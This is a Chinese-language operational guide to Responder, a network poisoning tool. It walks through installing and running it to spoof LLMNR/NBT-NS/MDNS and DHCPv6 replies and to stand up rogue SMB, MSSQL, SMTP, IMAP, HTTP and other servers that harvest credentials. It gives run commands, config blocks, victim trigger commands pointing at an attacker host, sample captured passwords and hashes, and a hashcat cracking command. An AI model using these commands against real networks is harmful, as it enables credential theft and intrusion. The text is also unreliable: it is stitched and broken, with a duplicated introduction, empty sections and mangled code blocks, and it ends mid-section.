Responder是一款LLMNR、NBT-NS和MDNS投毒工具,内置HTTP/SMB/MSSQL/FTP/LDAP欺诈认证服务器,支持NTLMv1/NTLMv2/LMv2、扩展安全NTLMSSP和基本HTTP认证。
Responder 是一个 LLMNR、NBT-NS 和 MDNS 毒化工具,内置针对 HTTP、SMB、MSSQL、FTP、LDAP、Kerberos、DNS 等协议的虚假认证服务器。它支持 NTLMv1/NTLMv2/LMv2、扩展安全 NTLMSSP 以及超过 15 种协议的各种认证方法。
Responder 通过响应 LLMNR、NBT-NS 和 MDNS 名称解析请求来捕获凭证。当客户端尝试解析不存在的主机名时,Responder 会应答,将客户端引导至攻击者机器,在那里多个虚假认证服务器捕获凭证。同时包含 DHCP 和 DHCPv6 虚假服务器,可单独启用。
捕获的数据:
此版本包括:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### 安装 Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## 快速开始
### 基础投毒```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### 强制HTTP基本认证```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## 网络投毒
### LLMNR/NBT-NS/MDNS 投毒
**目的:** 响应名称解析失败
**工作原理:**
1. 客户端广播查询不存在的主机
2. 响应者回答:"我就是那个主机"
3. 客户端连接到攻击者
4. 凭据被捕获
**配置:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
用法:```bash sudo python3 Responder.py -I eth0 -v
---
### DHCPv6 服务器
**目的:** 强制客户端通过 IPv6 使用攻击者的 DNS
**功能特性:**
- ✅ 支持 INFORMATION-REQUEST(Windows 10/11)
- ✅ 支持 SOLICIT/REQUEST
- ✅ 域名过滤(精确目标定位)
- ✅ 路由器通告(可选)
**工作原理:**
1. Windows 发送 DHCPv6 INFORMATION-REQUEST、SOLICIT、REQUEST
2. 响应器回应:DNS = 攻击者 IPv6
3. Windows 优先使用 IPv6 DNS
4. 所有 DNS 查询 → 攻击者
5. DNS 投毒 → 凭据捕获
**配置:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
用法:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**预期输出:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder 包含 17 个以上的伪造认证服务器:
用途: 从文件共享捕获 NetNTLM 哈希
特性:
触发方式:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**捕获的格式:**```
username::domain:challenge:response:blob
破解:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**配置:**```ini
[Responder Core]
SMB = On
目的: 捕获明文 FTP 凭证
功能:
触发器:```bash ftp attacker-ip
**捕获格式:**```
[FTP] Cleartext: username:password
配置:```ini [Responder Core] FTP = On
---
### 数据库服务器
#### MSSQL 服务器(端口 1433)
**用途:** 捕获 Microsoft SQL Server 身份验证
**功能:**
- ✅ SQL Server 身份验证
- ✅ Windows 身份验证 (NTLM)
- ✅ 明文 SQL 凭据
- ✅ NetNTLMv2 哈希捕获
**触发器:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
捕获的格式:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**配置:**```ini
[Responder Core]
SQL = On
备注:
目的: 捕获电子邮件客户端认证
特性:
STARTTLS 流程:``` Client → EHLO Server → 250-STARTTLS Client → STARTTLS Server → 220 Ready to start TLS [TLS handshake using self-signed cert] Client → AUTH PLAIN Server → Captured! ✅
**触发器:**```
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything
捕获的格式:``` [SMTP] LOGIN: [email protected]:Password123 [SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob [SMTP] CRAM-MD5: user:challenge:response
**配置:**```ini
[Responder Core]
SMTP = On
证书警告: 自签名证书警告属于正常现象。客户端首次连接会被拒绝,重试后成功,凭据仍会被捕获。
用途: 通过 STARTTLS 捕获 IMAP 认证信息
特性:
STARTTLS 流程:``` Client → CAPABILITY Server → * CAPABILITY IMAP4 AUTH=PLAIN AUTH=NTLM STARTTLS Client → STARTTLS Server → OK Begin TLS negotiation now [TLS upgrade] Client → LOGIN user password Server → Captured! ✅
**配置:**```ini
[Responder Core]
IMAP = On
目的: 基于 SSL 的 IMAP(原生加密)
特性:
与普通 IMAP 的区别:``` Port 143 (IMAP): Plain → STARTTLS → Encrypted Port 993 (IMAPS): Encrypted from start
**配置:**```ini
[Responder Core]
IMAPS = On
目的: 捕获 POP3 电子邮件检索凭据
功能:
触发器:``` Email client:
**捕获格式:**```
[POP3] USER: username
[POP3] PASS: password
配置:```ini [Responder Core] POP = On
---
### Web 服务器
#### HTTP 服务器(端口 80)
**用途:** 捕获 Web 认证
**特性:**
- ✅ NTLM 认证(NetNTLMv1/v2)
- ✅ 基本认证(明文)
- ✅ 摘要认证(MD5)
- ✅ WPAD 注入
**触发器:**```
Browser: http://attacker-ip/
UNC: file://attacker-ip/share
WPAD: Automatic proxy detection
强制基本认证:```bash sudo python3 Responder.py -I eth0 -b
**捕获的格式:**```
[HTTP] NTLM NTLMv2: user::DOMAIN:challenge:response:blob
[HTTP] Basic: user:password
[HTTP] Digest: user:realm:hash
配置:```ini [Responder Core] HTTP = On
---
#### HTTPS 服务器(端口 443)
**用途:** 带认证捕获的 HTTPS
**特点:**
- ✅ SSL/TLS 加密
- ✅ 所有 HTTP 认证方法
- ✅ 自签名证书
- ✅ 基于 HTTPS 的 WPAD
**配置:**```ini
[Responder Core]
HTTPS = On
SSLCert = certs/responder.crt
SSLKey = certs/responder.key
目的: 捕获 AS-REP 哈希,用于离线破解
特性:
工作原理: